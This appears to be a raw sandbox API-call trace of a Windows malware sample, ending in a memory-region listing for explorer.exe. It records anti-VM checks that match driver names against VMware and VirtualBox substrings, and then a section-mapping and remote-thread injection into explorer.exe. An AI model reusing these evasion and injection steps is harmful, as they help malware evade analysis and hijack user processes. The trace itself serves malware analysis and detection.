[0087.619] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0087.620] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0087.620] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0087.620] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0087.620] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0087.620] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vmci.s") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vmusbm") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vmmous") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vm3dmp") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vmrawd") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vmmemc") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vboxgu") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vboxsf") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vboxmo") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vboxvi") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vboxdi") returned 0x0 [0087.620] strstr (_Str="kd.dll", _SubStr="vioser") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0087.621] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0087.621] strstr (_Str="werkernel.sys", _SubStr="vmci.s") returned 0x0 [0087.621] strstr (_Str="werkernel.sys", _SubStr="vmusbm") returned 0x0 [0087.621] strstr (_Str="werkernel.sys", _SubStr="vmmous") returned 0x0 [0087.621] strstr (_Str="werkernel.sys", _SubStr="vm3dmp") returned 0x0 [0087.622] strstr (_Str="werkernel.sys", _SubStr="vmrawd") returned 0x0 [0087.622] strstr (_Str="werkernel.sys", _SubStr="vmmemc") returned 0x0 [0087.622] strstr (_Str="werkernel.sys", _SubStr="vboxgu") returned 0x0 [0087.622] strstr (_Str="werkernel.sys", _SubStr="vboxsf") returned 0x0 [0087.622] strstr (_Str="werkernel.sys", _SubStr="vboxmo") returned 0x0 [0087.622] strstr (_Str="werkernel.sys", _SubStr="vboxvi") returned 0x0 [0087.622] strstr (_Str="werkernel.sys", _SubStr="vboxdi") returned 0x0 [0087.622] strstr (_Str="werkernel.sys", _SubStr="vioser") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0087.622] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0087.622] strstr (_Str="tm.sys", _SubStr="vmci.s") returned 0x0 [0087.622] strstr (_Str="tm.sys", _SubStr="vmusbm") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vmmous") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vm3dmp") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vmrawd") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vmmemc") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vboxgu") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vboxsf") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vboxmo") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vboxvi") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vboxdi") returned 0x0 [0087.623] strstr (_Str="tm.sys", _SubStr="vioser") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0087.623] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vmci.s") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vmusbm") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vmmous") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vm3dmp") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vmrawd") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vmmemc") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vboxgu") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vboxsf") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vboxmo") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vboxvi") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vboxdi") returned 0x0 [0087.624] strstr (_Str="bootvid.dll", _SubStr="vioser") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vmci.s") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vmusbm") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vmmous") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vm3dmp") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vmrawd") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vmmemc") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vboxgu") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vboxsf") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vboxmo") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vboxvi") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vboxdi") returned 0x0 [0087.625] strstr (_Str="cmimcext.sys", _SubStr="vioser") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vmci.s") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vmusbm") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vmmous") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vm3dmp") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vmrawd") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vmmemc") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vboxgu") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vboxsf") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vboxmo") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vboxvi") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vboxdi") returned 0x0 [0087.625] strstr (_Str="ntosext.sys", _SubStr="vioser") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0087.626] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0087.626] strstr (_Str="msrpc.sys", _SubStr="vmci.s") returned 0x0 [0087.626] strstr (_Str="msrpc.sys", _SubStr="vmusbm") returned 0x0 [0087.626] strstr (_Str="msrpc.sys", _SubStr="vmmous") returned 0x0 [0087.626] strstr (_Str="msrpc.sys", _SubStr="vm3dmp") returned 0x0 [0087.626] strstr (_Str="msrpc.sys", _SubStr="vmrawd") returned 0x0 [0087.627] strstr (_Str="msrpc.sys", _SubStr="vmmemc") returned 0x0 [0087.627] strstr (_Str="msrpc.sys", _SubStr="vboxgu") returned 0x0 [0087.627] strstr (_Str="msrpc.sys", _SubStr="vboxsf") returned 0x0 [0087.627] strstr (_Str="msrpc.sys", _SubStr="vboxmo") returned 0x0 [0087.627] strstr (_Str="msrpc.sys", _SubStr="vboxvi") returned 0x0 [0087.627] strstr (_Str="msrpc.sys", _SubStr="vboxdi") returned 0x0 [0087.627] strstr (_Str="msrpc.sys", _SubStr="vioser") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vmci.s") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vmusbm") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vmmous") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vm3dmp") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vmrawd") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vmmemc") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vboxgu") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vboxsf") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vboxmo") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vboxvi") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vboxdi") returned 0x0 [0087.627] strstr (_Str="fltmgr.sys", _SubStr="vioser") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vmci.s") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vmusbm") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vmmous") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vm3dmp") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vmrawd") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vmmemc") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vboxgu") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vboxsf") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vboxmo") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vboxvi") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vboxdi") returned 0x0 [0087.628] strstr (_Str="ksecdd.sys", _SubStr="vioser") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vmci.s") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vmusbm") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vmmous") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vm3dmp") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vmrawd") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vmmemc") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vboxgu") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vboxsf") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vboxmo") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vboxvi") returned 0x0 [0087.628] strstr (_Str="clipsp.sys", _SubStr="vboxdi") returned 0x0 [0087.629] strstr (_Str="clipsp.sys", _SubStr="vioser") returned 0x0 [0087.629] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0087.640] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0087.641] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0087.641] strstr (_Str="acpiex.sys", _SubStr="vmci.s") returned 0x0 [0087.641] strstr (_Str="acpiex.sys", _SubStr="vmusbm") returned 0x0 [0087.641] strstr (_Str="acpiex.sys", _SubStr="vmmous") returned 0x0 [0087.641] strstr (_Str="acpiex.sys", _SubStr="vm3dmp") returned 0x0 [0087.641] strstr (_Str="acpiex.sys", _SubStr="vmrawd") returned 0x0 [0087.641] strstr (_Str="acpiex.sys", _SubStr="vmmemc") returned 0x0 [0087.641] strstr (_Str="acpiex.sys", _SubStr="vboxgu") returned 0x0 [0087.642] strstr (_Str="acpiex.sys", _SubStr="vboxsf") returned 0x0 [0087.642] strstr (_Str="acpiex.sys", _SubStr="vboxmo") returned 0x0 [0087.642] strstr (_Str="acpiex.sys", _SubStr="vboxvi") returned 0x0 [0087.642] strstr (_Str="acpiex.sys", _SubStr="vboxdi") returned 0x0 [0087.642] strstr (_Str="acpiex.sys", _SubStr="vioser") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vmci.s") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vmusbm") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vmmous") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vm3dmp") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vmrawd") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vmmemc") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vboxgu") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vboxsf") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vboxmo") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vboxvi") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vboxdi") returned 0x0 [0087.642] strstr (_Str="wpprecorder.sys", _SubStr="vioser") returned 0x0 [0087.643] strstr (_Str="cng.sys", _SubStr="vmci.s") returned 0x0 [0087.643] strstr (_Str="cng.sys", _SubStr="vmusbm") returned 0x0 [0087.643] strstr (_Str="cng.sys", _SubStr="vmmous") returned 0x0 [0087.643] strstr (_Str="cng.sys", _SubStr="vm3dmp") returned 0x0 [0087.643] strstr (_Str="cng.sys", _SubStr="vmrawd") returned 0x0 [0087.643] strstr (_Str="cng.sys", _SubStr="vmmemc") returned 0x0 [0087.643] strstr (_Str="cng.sys", _SubStr="vboxgu") returned 0x0 [0087.643] strstr (_Str="cng.sys", _SubStr="vboxsf") returned 0x0 [0087.643] strstr (_Str="cng.sys", _SubStr="vboxmo") returned 0x0 [0087.644] LocalFree (hMem=0x1dc2050) returned 0x0 [0087.644] Sleep (dwMilliseconds=0x1388) [0092.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ff1c*=0x0, ZeroBits=0x0, RegionSize=0x19ff24*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ff1c*=0x4e0000, RegionSize=0x19ff24*=0x6000) returned 0x0 [0092.649] GetShellWindow () returned 0x100d0 [0092.649] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x19fec8 | out: lpdwProcessId=0x19fec8) returned 0x644 [0092.650] NtOpenProcess (in: ProcessHandle=0x19ff18, DesiredAccess=0x40, ObjectAttributes=0x19ff00*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19fef8*(UniqueProcess=0x640, UniqueThread=0x0) | out: ProcessHandle=0x19ff18*=0x15c) returned 0x0 [0092.650] NtDuplicateObject (in: SourceProcessHandle=0x15c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x19ff1c, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x19ff1c*=0x160) returned 0x0 [0092.650] NtCreateSection (in: SectionHandle=0x19fed4, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed4*=0x164) returned 0x0 [0092.650] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0xffffffff, BaseAddress=0x19fee4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee4*=0x4f0000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0092.650] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0x160, BaseAddress=0x19feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19feec*=0x2830000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0095.615] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f0000, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe")) returned 0x62 [0095.615] NtCreateSection (in: SectionHandle=0x19fed0, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed0*=0x168) returned 0x0 [0095.616] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0xffffffff, BaseAddress=0x19fee0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee0*=0x500000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0095.616] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0x160, BaseAddress=0x19fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x19fee8*=0x520000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0095.621] RtlCreateUserThread (in: ProcessHandle=0x160, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x521a20, Parameter=0x2830000, ThreadHandle=0x19fe30*=0xc401dc2048, ClientId=0x0 | out: ThreadHandle=0x19fe30*=0x16c, ClientId=0x0) returned 0x0 [0095.670] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 4 os_tid = 0xb8c Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x1789f000" os_pid = "0x640" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 383 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 384 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 385 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 386 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 387 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 388 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 389 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 390 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 391 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 392 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 393 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 394 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 395 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 396 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 397 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 398 start_va = 0x420000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 399 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 400 start_va = 0x5a0000 end_va = 0x727fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 401 start_va = 0x730000 end_va = 0x730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 402 start_va = 0x740000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 403 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 404 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 405 start_va = 0x770000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 406 start_va = 0x900000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 407 start_va = 0x1d00000 end_va = 0x20fafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d00000" filename = "" Region: id = 408 start_va = 0x2100000 end_va = 0x2103fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 409 start_va = 0x2110000 end_va = 0x2122fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 410 start_va = 0x2130000 end_va = 0x2130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" Region: id = 411 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 412 start_va = 0x2150000 end_va = 0x2486fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 413 start_va = 0x2490000 end_va = 0x24a8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db" filename = 